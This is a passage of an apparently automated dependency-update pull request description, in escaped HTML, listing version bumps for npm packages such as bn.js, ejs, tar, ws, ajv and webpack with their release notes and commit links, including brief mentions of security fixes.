8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 6.0.5 to 6.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/v6.0.6/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003e6.0.6\u003c/a\u003e (2024-11-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef\"\u003eba5aaef\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c\"\u003ef4af31c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd\"\u003e\u003ccode\u003ed35c865\u003c/code\u003e\u003c/a\u003e chore(release): 6.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5a37e19173a759782e3f716b04c8df90a02daec8\"\u003e\u003ccode\u003e5a37e19\u003c/code\u003e\u003c/a\u003e chore: update package.json and package.lock\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef78340f0a4523a90276306b2f45fc6859a\"\u003e\u003ccode\u003eba5aaef\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c8ee70e1830450755eceac775876b391b9\"\u003e\u003ccode\u003ef4af31c\u003c/code\u003e\u003c/a\u003e fix(core): support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.9 to 3.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/d3f807dea9ce904e20a47a661f2310ce9134dc2a\"\u003e\u003ccode\u003ed3f807d\u003c/code\u003e\u003c/a\u003e Version 3.1.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/9ee26dde5d7015d9c0e2ff87314cabeac5247c02\"\u003e\u003ccode\u003e9ee26dd\u003c/code\u003e\u003c/a\u003e Mocha TDD\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5\"\u003e\u003ccode\u003ee469741\u003c/code\u003e\u003c/a\u003e Basic pollution protection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/715e9507fa3e6122dc6430fe0f25a6e6ded300c1\"\u003e\u003ccode\u003e715e950\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mde/ejs/issues/756\"\u003e#756\u003c/a\u003e from Jeffrey-mu/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/cabe3146ad964a1e98db7742abf435906ca79406\"\u003e\u003ccode\u003ecabe314\u003c/code\u003e\u003c/a\u003e Include advanced usage examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/29b076cdbbf3eb1b4323b33299ab6d79391b2c33\"\u003e\u003ccode\u003e29b076c\u003c/code\u003e\u003c/a\u003e Added header\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/11503c79af882e3635b513d57c7f1813792eb127\"\u003e\u003ccode\u003e11503c7\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:mde/ejs into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/7690404e2fc1688756938e4d2fc19e0fac77d736\"\u003e\u003ccode\u003e7690404\u003c/code\u003e\u003c/a\u003e Added security banner to README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/f47d7aedd51a983e4f73045f962b1209096b5800\"\u003e\u003ccode\u003ef47d7ae\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/828cea1687e3db459ab09d2f405d2444c7580b90\"\u003e\u003ccode\u003e828cea1\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.9...v3.1.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.6 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.6...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yauzl` from 3.2.0 to 3.2.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/c4695215b05c6adffda613b9051a2a85429b33fe\"\u003e\u003ccode\u003ec469521\u003c/code\u003e\u003c/a\u003e version 3.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/00c561b8cf1ff92e076f7087ac6287e510d4af54\"\u003e\u003ccode\u003e00c561b\u003c/code\u003e\u003c/a\u003e fix bounds checking logic on NtfsTimestamp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/277b294d23fc1c10ff772fa5e858830ca79d9892\"\u003e\u003ccode\u003e277b294\u003c/code\u003e\u003c/a\u003e comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/de292f220268473eb20aef64b0a77faa9d004d9a\"\u003e\u003ccode\u003ede292f2\u003c/code\u003e\u003c/a\u003e streamed zip file test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/e00f13978fe284d60199014f567fb9efc4df8499\"\u003e\u003ccode\u003ee00f139\u003c/code\u003e\u003c/a\u003e truncate long test file names for eCryptfs compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/d98e05247dc7b95f5f0bcd336a81aca6d8563b95\"\u003e\u003ccode\u003ed98e052\u003c/code\u003e\u003c/a\u003e fix name of Info-ZIP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/a8951a29884b9506b695575037bee608b09592cc\"\u003e\u003ccode\u003ea8951a2\u003c/code\u003e\u003c/a\u003e update readme\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/thejoshwolfe/yauzl/compare/3.2.0...3.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.4.3 to 7.5.12\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 7.5.8 to 7.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.5.10\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported e55e5106 to the 7.x release line (22c28763).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.5.9\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported bc8bd34e to the 7.x release line (0435e6e1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/d962d70649e393841ee1ed726a8f7ffbe90d0c06\"\u003e\u003ccode\u003ed962d70\u003c/code\u003e\u003c/a\u003e [dist] 7.5.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f\"\u003e\u003ccode\u003e22c2876\u003c/code\u003e\u003c/a\u003e [security] Fix crash when the Upgrade header cannot be read (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2231\"\u003e#2231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8a78f8770618cc5a1ade485a7445cb6d6f46e2f2\"\u003e\u003ccode\u003e8a78f87\u003c/code\u003e\u003c/a\u003e [dist] 7.5.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/0435e6e12b8d38992cf0651cb8605dde2294bd25\"\u003e\u003ccode\u003e0435e6e\u003c/code\u003e\u003c/a\u003e [security] Fix same host check for ws+unix: redirects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/7.5.8...7.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.91.0 to 5.105.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by 